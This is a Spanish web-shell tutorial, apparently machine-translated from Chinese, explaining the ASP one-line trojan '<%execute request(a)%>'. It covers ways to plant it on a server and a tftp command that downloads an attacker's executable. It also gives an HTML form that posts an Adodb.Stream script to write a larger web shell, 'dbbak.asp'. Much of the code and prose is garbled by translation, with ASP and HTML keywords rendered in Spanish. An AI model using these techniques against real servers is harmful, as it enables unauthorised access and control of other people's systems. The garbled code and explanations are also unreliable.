El troyano de una frase se inserta en el archivo ASP: Por supuesto, el troyano de una frase en sí es el archivo ASP. Se puede acceder mediante IE: solo si se puede acceder, podemos enviar los datos. Siempre que se pueda acceder, se puede.
Acceso a través del protocolo HTTP
En una frase, el ámbito de uso de los troyanos (solo enumeré 2 tipos):
1) Solo se requiere copia de seguridad de la base de datos
Cuando se realiza una copia de seguridad de la base de datos en un archivo ASP, no se produce ningún error de compilación y falta el indicador de cierre del script %>
2) Al configurar los permisos de SA, generalmente escribe una oración primero por conveniencia (por supuesto, es más rápido cargar palomas directamente a través de tftp y ejecutarlas).
tftp -i ip obtener server.exe
El principio del caballo de Troya <%execute request(a)%> en una frase:
saber primero
La función ejecutar () se utiliza para ejecutar el código asp. Es responsable de ejecutar el caballo que cargamos y pasarlo a asp.dll para su análisis. El código anterior <% ejecutar solicitud (a)%> se puede explicar así:
<%
si solicitud (a) <> entonces ejecute la solicitud (a)
%>
Si a no está vacío, se ejecutará ¿Qué se ejecutará?...
si un != 0
Echemos un vistazo al cliente:
<formulario acción=http://192.168.0.28/shell.asp método=post>
<nombre del área de texto=l columnas=120 filas=10 ancho=45>
set lP=server.CreateObject(Adodb.Stream) 'Crear componente Adodb.Stream...
lP.Abierto
lP.Tipo=2
lP.CharSet=gb2312
solicitud lP.writetext(p)
lP.SaveToFile server.mappath(dbbak.asp),2
lP.Cerrar
establecer lP = nada
respuesta.redireccionamiento dbbak.asp
</textarea>
<textarea name=p cols=120 rows=10 width=45>Datos a enviar</textarea><BR><center><br>
<tipo de entrada=valor de envío=enviar>
Adodb.Stream es responsable de cargar los datos leídos en el servidor:
Componente: Adobeb.Stream
Existen los siguientes métodos:
Cancelar método
como usarlo
Objeto.Cancelar
Descripción: Cancela la ejecución de una llamada al método Execute o Open asíncrona pendiente.
Método WriteText
Cómo usarlo:
Objeto.Escribir(Datos,[Opciones])
Descripción: carga los datos de texto especificados en el objeto.
Descripción del parámetro: Los datos son el contenido especificado que se escribirá.
Opciones Las opciones para escribir, que se pueden dejar sin especificar. Los parámetros opcionales son los siguientes:
anuncioWriteChar =0
línea de escritura de anuncios =1
Método SaveToFile
Cómo usarlo:
Object.SaveToFile(NombreDeArchivo,[Opciones])
Descripción: escribe el contenido del objeto en el archivo especificado por FileName
Es decir, el nombre del archivo donde guardamos el troyano es dbbak.asp
Descripción del parámetro: Archivo especificado por FileName
Opciones de acceso a opciones, que se pueden dejar sin especificar. Los parámetros opcionales son los siguientes:
anuncioGuardarCreateNotExist =1
anuncioGuardarCreateOverWrite =2
Después de enviar una oración troyana, el valor de a está vacío y esperando un valor escrito. Acceder a http://www.***.com/**.asp es el proceso de espera Cómo prepararse para la ejecución usando ejecutar (. ) función.. .
Crear un Adodb.Stream, encargado de escribir nuestros datos en el servidor...
Al mismo tiempo, la variable SaveToFile definida por este componente define nuestro nombre en Malasia..dbbak.asp
Después de enviarlo al servidor, la función ejecutar () detecta que el valor de a no está vacío, por lo que ejecuta nuestro Malasia.